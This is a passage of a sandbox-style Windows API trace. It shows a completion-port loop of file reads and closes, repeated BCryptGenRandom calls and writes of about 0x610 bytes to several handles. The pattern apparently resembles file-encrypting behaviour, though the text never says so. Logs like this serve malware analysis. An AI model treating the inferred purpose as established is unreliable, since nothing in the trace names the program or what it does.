lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0190.728] CloseHandle (hObject=0x338) returned 1 [0190.728] free (_Block=0x3e70008) [0190.728] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0190.735] ReadFile (in: hFile=0x3cc, lpBuffer=0x3f7007c, nNumberOfBytesToRead=0x10d83, lpNumberOfBytesRead=0x0, lpOverlapped=0x3f70048 | out: lpBuffer=0x3f7007c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3f70048) returned 1 [0190.742] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0190.748] ReadFile (in: hFile=0x338, lpBuffer=0x3e7003c, nNumberOfBytesToRead=0x15d75, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008) returned 1 [0190.751] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0190.752] CloseHandle (hObject=0x338) returned 1 [0190.752] free (_Block=0x3e70008) [0190.752] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0190.753] ReadFile (in: hFile=0x330, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0190.826] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0190.828] CloseHandle (hObject=0x330) returned 1 [0190.828] free (_Block=0x1ff1e60) [0190.828] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0191.590] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0191.591] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0191.591] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0191.591] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0191.591] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0191.591] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0191.592] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0191.592] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0191.592] free (_Block=0x3e305b8) [0191.592] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0191.592] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0191.592] free (_Block=0x1fa91d0) [0191.592] free (_Block=0x1fa2ed8) [0191.592] free (_Block=0x1fa90b8) [0191.592] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0191.594] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0191.595] CloseHandle (hObject=0x170) returned 1 [0191.595] free (_Block=0x3df0008) [0191.595] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0192.018] ReadFile (in: hFile=0x338, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x39d, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 1 [0192.018] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0192.018] CloseHandle (hObject=0x338) returned 1 [0192.018] free (_Block=0x3d70450) [0192.019] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0192.047] ReadFile (in: hFile=0x338, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x3bf, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0192.047] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0192.049] CloseHandle (hObject=0x338) returned 1 [0192.049] free (_Block=0x3df0008) [0192.049] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0192.065] ReadFile (in: hFile=0x338, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x3c5, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0192.065] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0192.065] CloseHandle (hObject=0x338) returned 1 [0192.065] free (_Block=0x3df0008) [0192.065] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0192.078] ReadFile (in: hFile=0x170, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x3c1, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0192.078] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0192.080] CloseHandle (hObject=0x170) returned 1 [0192.080] free (_Block=0x1ff1e60) [0192.080] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0192.092] ReadFile (in: hFile=0x338, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x3c1, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0192.092] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0192.093] CloseHandle (hObject=0x338) returned 1 [0192.093] free (_Block=0x3df0008) [0192.093] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0192.103] ReadFile (in: hFile=0x170, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x39f, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0192.103] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0192.104] CloseHandle (hObject=0x170) returned 1 [0192.104] free (_Block=0x1ff1e60) [0192.104] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0192.114] ReadFile (in: hFile=0x338, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x3c0, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0192.114] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0192.115] CloseHandle (hObject=0x338) returned 1 [0192.115] free (_Block=0x3df0008) [0192.116] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0192.123] ReadFile (in: hFile=0x170, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x39e, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0192.123] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0192.124] CloseHandle (hObject=0x170) returned 1 [0192.124] free (_Block=0x1ff1e60) [0192.124] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0192.139] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x3c4, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0192.139] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0192.139] CloseHandle (hObject=0x170) returned 1 [0192.139] free (_Block=0x3df0008) [0192.139] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0192.147] ReadFile (in: hFile=0x338, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x3c4, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0192.147] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0192.147] CloseHandle (hObject=0x338) returned 1 [0192.147] free (_Block=0x1ff1e60) [0192.147] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0192.162] ReadFile (in: hFile=0x338, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x3c2, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0192.162] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0192.163] CloseHandle (hObject=0x338) returned 1 [0192.164] free (_Block=0x3df0008) [0192.164] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0193.401] ReadFile (in: hFile=0x170, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x3c4, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0193.401] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0193.402] CloseHandle (hObject=0x170) returned 1 [0193.402] free (_Block=0x1ff1e60) [0193.402] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0193.448] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0193.448] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0193.449] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0193.449] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0193.449] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0193.449] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0193.449] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0193.449] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0193.449] free (_Block=0x3e305b8) [0193.449] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0193.449] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0193.450] free (_Block=0x1fa91d0) [0193.450] free (_Block=0x1fa2ed8) [0193.450] free (_Block=0x1fa90b8) [0193.450] WriteFile (in: hFile=0x338, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0193.450] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0193.460] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0193.460] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0193.460] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0193.460] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0193.461] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0193.461] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0193.461] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0193.461] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0193.461] free (_Block=0x3e305b8) [0193.461] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0193.461] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0193.461] free (_Block=0x1fa91d0) [0193.461] free (_Block=0x1fa2ed8) [0193.462] free (_Block=0x1fa90b8) [0193.462] WriteFile (in: hFile=0x330, lpBuffer=0x3d70484*, nNumberOfBytesToWrite=0x61c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 1 [0193.462] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0193.471] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0193.472] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0193.472] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0193.472] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0193.472] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0193.472] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0193.472] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0193.472] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0193.472] free (_Block=0x3e305b8) [0193.472] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0193.472] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0193.473] free (_Block=0x1fa91d0) [0193.473] free (_Block=0x1fa2ed8) [0193.473] free (_Block=0x1fa90b8) [0193.473] WriteFile (in: hFile=0x3cc, lpBuffer=0x3f7007c*, nNumberOfBytesToWrite=0x611, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3f70048 | out: lpBuffer=0x3f7007c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3f70048) returned 1 [0193.474] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0193.481] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0193.481] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0193.481] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0193.481] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0193.482] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0193.482] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0193.483] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0193.483] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0193.483] free (_Block=0x3e305b8) [0193.483] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0193.483] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0193.483] free (_Block=0x1fa91d0) [0193.483] free (_Block=0x1fa2ed8) [0193.483] free (_Block=0x1fa90b8) [0193.483] WriteFile (in: hFile=0x308, lpBuffer=0x3e7003c*, nNumberOfBytesToWrite=0x61e, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008) returned 1 [0193.485] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0193.521] CloseHandle (hObject=0x338) returned 1 [0193.521] free (_Block=0x1ff1e60) [0193.521] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0193.531] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0193.531] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0193.531] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0193.531] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0193.531] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0193.531] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0193.532] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0193.532] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0193.532] free (_Block=0x3e305b8) [0193.532] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0193.532] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0193.532] free (_Block=0x1fa91d0) [0193.532] free (_Block=0x1fa2ed8) [0193.532] free (_Block=0x1fa90b8) [0193.532] WriteFile (in: hFile=0x308, lpBuffer=0x3e7003c*, nNumberOfBytesToWrite=0x612, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008) returned 1 [0193.534] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0193.545] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0193.545] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0193.545] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0193.545] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0193.546] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0193.546] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0193.546] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0193.546] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0193.546] free (_Block=0x3e305b8) [0193.546] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0193.547] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0193.547] free (_Block=0x1fa91d0) [0193.547] free (_Block=0x1fa2ed8) [0193.547] free (_Block=0x1fa90b8) [0193.547] WriteFile (in: hFile=0x338, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x61f, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0193.549] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0193.938] WriteFile (in: hFile=0x338, lpBuffer=0x3d70484*, nNumberOfBytesToWrite=0x3c0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 1 [0193.938] GetQueuedCompletionStatus (in: 